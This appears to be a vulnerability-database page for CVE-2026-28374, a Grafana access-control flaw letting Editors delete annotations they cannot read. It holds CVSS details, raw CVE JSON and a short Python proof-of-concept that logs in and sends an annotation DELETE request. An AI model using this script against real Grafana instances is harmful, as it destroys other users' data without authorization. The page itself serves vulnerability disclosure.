Security Vulnerability Report
CVE-2026-28374 CVSS 4.3 MEDIUM

Published: 2026-05-13 20:16:20
Last Modified: 2026-05-14 16:21:03

Description

Editors could delete any annotation, including annotations they did not have read access to, even though the Editor user could neither create nor read those annotations.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Grafana (see the official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://localhost:3000"
annotation_id = "1"  # ID of the annotation to delete
username = "editor"
password = "password"

# Create session and authenticate
session = requests.Session()
auth_data = {"user": username, "password": password}
login = session.post(f"{target_url}/login", data=auth_data)

if login.status_code == 200:
    # Exploit: Send DELETE request to remove annotation
    # Vulnerability allows Editors to delete annotations they cannot read
    delete_url = f"{target_url}/api/annotations/{annotation_id}"
    response = session.delete(delete_url)
    if response.status_code == 200:
        print(f"[+] Success: Annotation {annotation_id} deleted.")
    else:
        print(f"[-] Failed: Status code {response.status_code}")
else:
    print("[-] Authentication failed")

References

https://grafana.com/security/security-advisories/cve-2026-28374
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-28374",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T20:16:19.583",
    "lastModified": "2026-05-14T16:21:02.930",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Editors could delete any annotation, even those they do not have read access to. The editor user cannot create or read the annotations."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://grafana.com/security/security-advisories/cve-2026-28374",
        "source": "[email protected]"
      }
    ]
  }
}